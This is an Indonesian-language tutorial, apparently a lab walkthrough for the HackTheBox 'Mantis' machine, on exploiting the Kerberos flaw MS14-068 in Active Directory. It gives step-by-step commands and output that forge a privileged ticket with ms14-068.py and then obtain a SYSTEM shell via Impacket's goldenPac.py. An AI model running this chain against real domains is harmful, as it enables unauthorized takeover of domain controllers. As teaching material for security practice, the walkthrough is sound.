Active Directory memanfaatkan Kerberos sebagai protokol otentikasi. Pada tahun 2014 terdapat kerentanan pada protokol ini yang memungkinkan penyerang untuk mengelabui Domain Controller dan mendapatkan Golden Ticket.
Kerentanan ini dikenal sebagai MS14-068 atau CVE-2014-6324.
Karena kerentanan ini telah diketahui sejak lama, maka Windows Server yang terdampak pun adalah versi lama. Contoh:
Tujuan
Prasyarat
- Memiliki domain user
- Windows Server rentan terhadap MS14-068
Tahapan eksploitasi
Step 1: Persiapkan Environment
- Install tools yang dibutuhkan:
1
| ➜ sudo apt-get install krb5-user cifs-utils rdate
|
- Pointing domain pada file
/etc/hosts:
1
2
| ➜ cat /etc/hosts | grep mantis
10.10.10.52 mantis.htb.local htb.local mantis
|
- Tambahkan nameserver DC pada file
/etc/resolv.conf:
1
2
| nameserver 10.10.10.52
nameserver 1.1.1.1
|
- Konfigurasi Kerberos pada file
/etc/krb5.conf:
1
2
3
4
5
6
7
8
9
10
11
12
| [libdefaults]
default_realm = HTB.LOCAL
[realms]
htb.local = {
kdc = mantis.htb.local:88
admin_serve = mantis.htb.local
default_domain = htb.local
}
[domain_realm]
.domain.internal = htb.local
domain.internal = htb.local
|
- Sinkronisasi waktu dengan DC:
1
2
3
4
| # cara 1
➜ ntpdate 10.10.10.52
# cara 2
➜ rdate -n 192.168.1.31
|
Step 2: Percobaan Membuat Kerberos Ticket
1
2
3
4
5
6
7
8
9
10
11
12
| # percobaan generate kerberos ticket
➜ kinit <username>
Password for <username>@<domain>:
# cek list kerberos ticket. Perhatikan nama file, di sini /tmp/krb5cc_0
➜ klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: <username>@<domain>
Valid starting Expires Service principal
08/30/2020 16:44:33 08/31/2020 02:44:33 krbtgt/HTB.LOCAL@HTB.LOCAL
renew until 08/31/2020 16:44:26
|
- Mencoba mengakses share
c$ menggunakan ticket saat ini
1
2
3
| # pada saat ini wajar kita tidak bisa mengakses c$, karena user yang digunakan tidak memiliki akses
➜ smbclient -W htb.local //<domain>/c$ -k
tree connect failed: NT_STATUS_ACCESS_DENIED
|
Step 4: Eksploitasi MS14-068
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
| # menadapatkan SID user saat ini
➜ rpcclient -U <username> <ip-dc>
rpcclient $> lookupnames <username>
# eksploitasi ms14-068 dan dapatkan ticket baru
➜ python ms14-068.py -u <username@domain> -s <SID> -d <domain/fqdn>
Password:
[+] Building AS-REQ for mantis.htb.local... Done!
[+] Sending AS-REQ to mantis.htb.local... Done!
[+] Receiving AS-REP from mantis.htb.local... Done!
[+] Parsing AS-REP from mantis.htb.local... Done!
[+] Building TGS-REQ for mantis.htb.local... Done!
[+] Sending TGS-REQ to mantis.htb.local... Done!
[+] Receiving TGS-REP from mantis.htb.local... Done!
[+] Parsing TGS-REP from mantis.htb.local... Done!
[+] Creating ccache file 'TGT_<username>@<domain>.ccache'... Done!
# salin ticket baru ke /tmp/krb5cc_0
➜ cp TGT_<username>@<domain>.ccache /tmp/krb5cc_0
# sekarang kita dapat mengakses share c$
➜ smbclient -W htb.local //mantis/c$ -k
Try "help" to get a list of possible commands.
smb: \>
# remote shell (impacket)
➜ goldenPac.py <domain>/<user>:<password>@<domain/fqdn>
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file dnkIDkwn.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service IPbK on mantis.htb.local.....
[*] Starting service IPbK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
|
Referensi
- https://wizard32.net/blog/knock-and-pass-kerberos-exploitation.html
- https://0xdf.gitlab.io/2020/09/03/htb-mantis.html